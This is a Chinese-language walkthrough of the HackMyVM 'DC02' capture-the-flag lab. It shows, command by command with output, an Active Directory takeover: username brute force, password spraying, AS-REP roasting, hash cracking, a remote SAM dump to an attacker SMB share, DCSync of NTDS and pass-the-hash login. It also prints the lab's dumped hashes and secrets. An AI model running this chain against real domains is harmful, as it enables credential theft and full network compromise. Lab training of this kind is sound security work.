21.DC02
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=DC02
作者:[josemlwdf](https://hackmyvm.eu/profile/?user=josemlwdf)
难度:⭐️⭐️⭐️⭐️
知识点:ASREPRoasting、Bloodhound分析、SAM转储、DCSync 、kerbrute 爆破
2. 信息收集
2.1. 端口扫描
nmap -sC -sV 192.168.56.126 -p- -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 11:36 CST
Stats: 0:02:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 11:39 (0:00:14 remaining)
Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 11:39 (0:00:15 remaining)
Nmap scan report for 192.168.56.126
Host is up (0.00022s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 02:57:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn\_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|\_http-server-header: Microsoft-HTTPAPI/2.0
|\_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn\_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49707/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:F5:A3:8F (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|\_ Message signing enabled and required
|\_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f5:a3:8f (Oracle VirtualBox virtual NIC)
|\_clock-skew: -40m50s
| smb2-time:
| date: 2024-11-20T02:58:01
|\_ start\_date: N/A
192.168.56.126:389 open
192.168.56.126:53 open
192.168.56.126:135 open
192.168.56.126:445 open
192.168.56.126:464 open
192.168.56.126:88 open
192.168.56.126:593 open
192.168.56.126:636 open
192.168.56.126:139 open
192.168.56.126:3268 open
192.168.56.126:3269 open
192.168.56.126:5985 open
192.168.56.126:9389 open
192.168.56.126:49667 open
192.168.56.126:49664 open
192.168.56.126:49674 open
192.168.56.126:49687 open
192.168.56.126:49707 open
[\*] alive ports len is: 18
start vulscan
[\*] NetBios 192.168.56.126 [+] DC:SOUPEDECODE\DC01
[\*] WebTitle http://192.168.56.126:5985 code:404 len:315 title:Not Found
[\*] NetInfo
[\*]192.168.56.126
[->]DC01
[->]192.168.56.126
域名 SOUPEDECODE
先配置hosts
vim /etc/hosts
192.168.56.126 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL
2.2. SMB空会话检测
目标开放了 139 445端口
smbmap 检测一下是否存匿名登录与来宾登录
─# smbmap -u anonymous -H SOUPEDECODE.LOCAL
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 0 SMB session(s)
发现目标并没有开启SMB 空会话 与LDAP匿名登录
3. kerbrute 爆破
我们利用常见用户名作为字典 对Kerberos 身份验证来枚举域中可能存在的用户。
kerbrute userenum -d SOUPEDECODE.LOCAL -t 50 --dc DC01.SOUPEDECODE.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o valid\_user.txt
\_\_ \_\_ \_\_
/ /\_\_\_\_\_ \_\_\_\_\_/ /\_ \_\_\_\_\_\_\_ \_\_/ /\_\_\_\_
/ //\_/ \_ \/ \_\_\_/ \_\_ \/ \_\_\_/ / / / \_\_/ \_ \
/ ,< / \_\_/ / / /\_/ / / / /\_/ / /\_/ \_\_/
/\_/|\_|\\_\_\_/\_/ /\_.\_\_\_/\_/ \\_\_,\_/\\_\_/\\_\_\_/
Version: v1.0.3 (9dad6e1) - 11/20/24 - Ronnie Flathers @ropnop
2024/11/20 12:10:37 > Using KDC(s):
2024/11/20 12:10:37 > DC01.SOUPEDECODE.LOCAL:88
2024/11/20 12:10:37 > [+] VALID USERNAME: admin@SOUPEDECODE.LOCAL
2024/11/20 12:10:37 > [+] VALID USERNAME: charlie@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Charlie@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Admin@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: Administrator@SOUPEDECODE.LOCAL
2024/11/20 12:10:38 > [+] VALID USERNAME: CHARLIE@SOUPEDECODE.LOCAL
2024/11/20 12:10:40 > [+] VALID USERNAME: ADMIN@SOUPEDECODE.LOCAL
2024/11/20 12:11:04 > [+] VALID USERNAME: wreed11@SOUPEDECODE.LOCAL
2024/11/20 12:12:02 > [+] VALID USERNAME: printserver@SOUPEDECODE.LOCAL
2024/11/20 12:12:57 > [+] VALID USERNAME: kleo2@SOUPEDECODE.LOCAL
2024/11/20 12:14:00 > [+] VALID USERNAME: dc01@SOUPEDECODE.LOCAL
2024/11/20 12:14:46 > [+] VALID USERNAME: aDmin@SOUPEDECODE.LOCAL
2024/11/20 12:15:08 > [+] VALID USERNAME: ChArLiE@SOUPEDECODE.LOCAL
2024/11/20 12:15:09 > [+] VALID USERNAME: CHarlie@SOUPEDECODE.LOCAL
2024/11/20 12:15:20 > Done! Tested 8295455 usernames (15 valid) in 282.207 seconds
-d 域名
-t 线程
--dc DC-o 输出到文件
提取一下用户名
//提取出用户名 并全部转为小写
cat valid\_user.txt | grep @ | cut -d " " -f8 | cut -d '@' -f1 | while read a; do echo "$a" | tr '[:upper:]' '[:lower:]' >> valid\_user\_lowercase.txt; done
//去重
cat valid\_user\_lowercase.txt | sort -u > valid\_usernames.txt
3.1. 密码喷涂
获取到了用户名单valid_usernames.txt
尝试利用用户名作为密码进行密码喷涂
--no-bruteforce 禁用暴力破解尝试
--continue-on-success 在成功验证某个用户名和密码后,程序继续运行,不会因为一个成功的验证就停止所有后续操作
crackmapexec smb SOUPEDECODE.LOCAL -u valid\_usernames.txt -p valid\_usernames.txt --no-bruteforce --continue-on-success
SMB SOUPEDECODE.LOCAL 445 DC01 [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\admin:admin STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:administrator STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [+] SOUPEDECODE.LOCAL\charlie:charlie
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\dc01:dc01 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\printserver:printserver STATUS\_LOGON\_FAILURE
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS\_LOGON\_FAILURE
成功获取到了一个用户的密码
charlie:charlie
4. ASREPRoasting
4.1. 相对标识符(RID)暴力枚举出域内的其他用户
crackmapexec smb SOUPEDECODE.LOCAL -u 'charlie' -p 'charlie' --rid-brute > rid\_bruteforce.txt
cat rid\_bruteforce | grep 'SidTypeUser' | cut -d '\' -f2 | cut -d ' ' -f1 > domain\_users.txt
4.2. 枚举禁用了 Kerberos 预认证的用户
利用impacket-GetNPUsers 枚举禁用 Kerberos 预认证的用户以获取可以用于 AS-REP-Roasting 攻击的用户
禁用预认证的用户会向域控制器发送不包含加密的身份验证请求,因此攻击者可以捕获 AS-REP 响应并进行密码破解。
在这之前需要先将时间与域时间对齐
timedatectl set-ntp off
rdate -n 192.168.56.126
impacket-GetNPUsers SOUPEDECODE.LOCAL/ -dc-ip 192.168.56.126 -no-pass -usersfile domain\_users.txt | grep -v '[-]'
impacket-GetNPUsers SOUPEDECODE.LOCAL/ -dc-ip 192.168.56.126 -no-pass -usersfile domain\_users.txt | grep -v '[-]'
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:9db51e4c05b23c0562b08157315f848a$f5b6d13bb1d2dcd2c0f56218183d0c552a69ccde25bea3b39dc4f82002b6a42d05b8753a81230a65f62f6b091be00057d2a2d106a9d9c4e3ac99a70b3071cd822bb3536bf51cb9f94b3b7217594b2fff7baf7a4b195651753b7c9b87148f424f9255eafea3565df4dde77b2abeaa649f4b2b6877044936c66419aec3db1b4a4e066df447176c63f01de9a9ef41b8b846f3ba870a4237e50560dbbeb84d4b0f82afca660940e70ac6693bf7c82ffcba601384a110498dd4b7e5f7b4ca761830c8ff04b18dea82abf62c62bd00ab9948561b4ff09daf864b94745170d4239da474d8d016f72bb84ec0efa4147dc7eb6e4c327b8e9b0308
4.3. 暴力破解AS-REP响应密码hash
我们获取到zximena448用户的 AS-REP 响应的加密密码哈希
它包含了目标用户的 Kerberos 密码
我们可以尝试利用hashcat对其进行破解以获取用户密码
hashcat -a 0 -m 18200 as-rep.txt rockyou.txt
成功爆破出密码internet
5. Bloodhound收集域内信息
利用zximena448用户与密码 收集域内信息
在这之前,我们要先用 dnschef 设置一个虚假的 DNS 服务器并运行 Bloodhound,然后在运行 BloodHound 时让它使用假的 DNS 服务器 IP 进行域名解析。这样可以帮我们获取更多的信息
dnschef --fakeip 192.168.56.126
收集域内信息
bloodhound-python -u 'zximena448' -p 'internet' -ns 127.0.0.1 -d SOUPEDECODE.LOCAL -dc DC01.SOUPEDECODE.LOCAL --zip
启动neo4j 然后用Bloodhood GUI 对获取的压缩包进行分析
上传压缩包里面的json文件
找到我们当前的用户zximena448
我们可以发现zximena448用户是backup operator 组的成员。
此组可以备份存储凭据的 SAM 数据库。但由于该用户无法登录 DC01,我们用 Impacket 工具远程备份此数据库。我们需要先启动一个 SMB 服务器,然后将SAM数据库备份从服务器上传到我们的攻击机。
在当前目录启动一个 SMB 服务器 并挂到后台
impacket-smbserver -smb2support share . &
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[\*] Config file parsed
[\*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[\*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[\*] Config file parsed
[\*] Config file parsed
[\*] Config file parsed
设置 SMB 服务器后,我们利用impacket-reg 工具远程备份SAM注册表项。
impacket-reg -dc-ip 192.168.56.126 SOUPEDECODE.LOCAL/zximena448:internet@192.168.56.126 backup -o '\\192.168.56.6\share'
然后使用impacket-secretsdump 转储这个SAM备份的内容
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[\*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[\*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[\*] Dumping cached domain logon information (domain/username:hash)
[\*] Dumping LSA Secrets
[\*] $MACHINE.ACC
$MACHINE.ACC:plain\_password\_hex:30d0ca9ed25597562013a17fe07bcc24a8063aa89da83698090451d4f9c01497d07956aee9f517760560ca9817836b8aaa5a0706c8e3d358c8248d48c5c42388c80af03a4c70c4e75a55066bbc2ea68747c758fe4e41e80a4a6a2d9c9bd68c94ebc3e8fbbc89d06985163c8de5071d80a1c55c33a83b3c006c123eae6c0e5706412271e110ae7fd8e39482ae539bb6f9441b2340dbcd8fb1593198b778f09317469e8dd572d14e42031997298f68ec498f5bb6a2c295cd7c9dbadfcb88f74e7e0cb5b25b39ca43d970cb8c1b5b506c316438d7de4c8d0d6b1ac2f2985ef7eb35e0951cff704cae50ac45eff772a29f9e
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f984aa0aa19fcb118d6b20506ce75c6d
[\*] DPAPI\_SYSTEM
dpapi\_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi\_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[\*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[\*] Cleaning up...
发现这里面有Administrator用户的hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
尝试能不能使用这个hash进行登录
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'Administrator' -H 209c6174da490caeb422f3fa5a7ae634
SMB SOUPEDECODE.LOCAL 445 DC01 [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:209c6174da490caeb422f3fa5a7ae634 STATUS\_LOGON\_FAILURE
登录失败了
没关系我们还有机器账户的hash ($MACHINE.ACC)
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:f984aa0aa19fcb118d6b20506ce75c6d
6.1. 利用机器hash进行密码喷射
进行密码喷射之前,我们还需要获取目标的所有机器账户列表
我们可以利用Bloodhood收集的压缩包里面的computer.json文件获取
unzip 20241120140128\_bloodhound.zip
cat 20241120140128\_computers.json | jq . | grep samaccountname | cut -d '"' -f4 > machines.txt
使用 CrackMapExec 进行密码喷射
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u machines.txt -H f984aa0aa19fcb118d6b20506ce75c6d | grep -v '[-]'
SMB SOUPEDECODE.LOCAL 445 DC01 [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB SOUPEDECODE.LOCAL 445 DC01 [+] SOUPEDECODE.LOCAL\DC01$:f984aa0aa19fcb118d6b20506ce75c6d
7. DCSync攻击
通过密码喷射 我们知道了这个hash是机器账户DC01$的
利用bloodhood GUI 对DC01$进行分析
可以看到DC01$ 是 Administrator 组的成员,我们可以使用此组成员身份权限对域控制器执行 DCSync 攻击。
在Enterprise Admin 组 也可以进行DCSync攻击能够执行能够执行 replication synchronization 权限 也可以
crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'DC01$' -H f984aa0aa19fcb118d6b20506ce75c6d --ntds >ntds.txt
--ntds 获取NTDS.dit 文件的内容这个文件是 Windows 域控的 Active Directory 数据库,包含了所有域账户的信息,包括密码哈希、Kerberos 密钥等敏感信息
管理员的hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
7.1. winrm登录
我们已经转储了域中所有用户的凭证。利用管理员的哈希值通过 WinRm 在本地登录到域控获取flag
evil-winrm -i 192.168.56.126 -u Administrator -H 8982babd4da89d33210779a6c5b078bd
\*Evil-WinRM\* PS C:\Users\Administrator\Documents> type C:\Users\zximena448\Desktop\user.txt
2fe79eb0e02ecd4dd2833cfcbbdb504c
\*Evil-WinRM\* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
d41d8cd98f00b204e9800998ecf8427e